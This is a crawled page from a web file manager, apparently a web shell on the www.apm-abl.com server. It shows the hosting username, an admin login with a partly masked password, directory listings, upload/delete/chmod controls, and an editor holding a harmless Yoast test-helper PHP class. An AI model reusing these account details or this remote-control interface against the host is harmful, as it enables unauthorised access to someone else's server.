🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_e170bfb8 / b1a4****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: upgrade-detector.php
<?php namespace Yoast\WP\Test_Helper; /** * Upgrade detector, spawns a notification if an upgrade is being run. */ class Upgrade_Detector implements Integration { /** * Registers WordPress hooks and filters. * * @return void */ public function add_hooks() { \add_action( 'wpseo_run_upgrade', [ $this, 'yoast_seo_upgrade_ran' ] ); \add_action( 'update_option_wpseo_premium_version', [ $this, 'yoast_seo_premium_upgrade_ran' ] ); } /** * Adds the notification to the stack. * * @return void */ public function yoast_seo_upgrade_ran() { $this->add_notification( \esc_html__( 'The Yoast SEO upgrade routine was executed.', 'yoast-test-helper' ) ); } /** * Adds the notification to the stack. * * @return void */ public function yoast_seo_premium_upgrade_ran() { $this->add_notification( \esc_html__( 'Yoast SEO Premium updated its version number, which should mean the upgrade routine was executed.', 'yoast-test-helper' ) ); } /** * Adds a success notification for an upgrade. * * @param string $notification_text The notification text to show. * * @return void */ private function add_notification( $notification_text ) { $notification = new Notification( $notification_text, 'success' ); \do_action( 'Yoast\WP\Test_Helper\notification', $notification ); } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar